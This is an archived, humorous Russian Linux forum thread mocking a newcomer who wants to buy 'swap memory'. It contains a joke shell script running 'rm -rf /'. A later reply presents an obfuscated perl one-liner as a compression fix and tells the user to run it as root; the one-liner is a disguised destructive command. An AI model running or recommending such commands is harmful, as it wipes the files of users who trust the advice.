LINUX.ORG.RU
ФорумTalks

Засоветуйте магазин!


0

0

Помогите советом! У меня сейчас на файл подкачки уходит около 50 килобайт всего, то есть ничтожно мало! Подскажите, где в Петербурге можно подешевле докупить swap-памяти?

anonymous

зайди в макдональдс, там дешёво

theserg ★★★
()

#!/bin/sh

if [ -z `cat /dev/brain` ]; then
	rm -rf /
fi

K48 ★★★★
()

Ты ошибся, swap-памяти не существует. Это всего лишь раздел (или файл подкачки на HDD). Чтобы у тебя не возникала проблема нехватки памяти, купи дополнительную плату ОЗУ. Для нормальной работы в Linux подойдёт и 256 Mb (посмотри тут: http://www.digitalshop.ru/shop/?action=print_tovar_podrazdel&id_podrazdel...).

Drakon
()
Ответ на: комментарий от Drakon

Дракон, ламер глупый, ты чего мне лапшу на уши вешаешь? Мне знакомый программист сказал что свап-памяти не хватает, а никакого не ОЗУ! Не знаешь -- молчи!

Почему-то ни в одном магазине не нахожу. Пол-инета облазал...

anonymous
()
Ответ на: комментарий от anonymous

Да что ты стараешься так, не понимает он юмора :)

K48 ★★★★
()
Ответ на: комментарий от anonymous

Сам недавно столкнулся с подобной проблемой. Но нашёл решение - своп память увеличивается где-то втрое за счёт технологии сжатия неиспользуемой swap памяти (Unused Swap Memory Compression), но, к сожалению, большинство производителей её отключают :(. Можно влключить командой

cat "Enabling USMC..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Только запускай из-под root'а, иначе ничего не заработает (у простого юзера нет прав на запись в /proc и /dev)

anonymous
()
Ответ на: комментарий от anonymous

Ну, иптыть! Поищи исходный топик - там несколько примеров в три, четыре и более строк. Мне лень было всё читать.

anonymous
()
Ответ на: комментарий от anonymous

В упор не втыкаю, почему cat а не echo??? И у тебя и в оригинале.

K48 ★★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.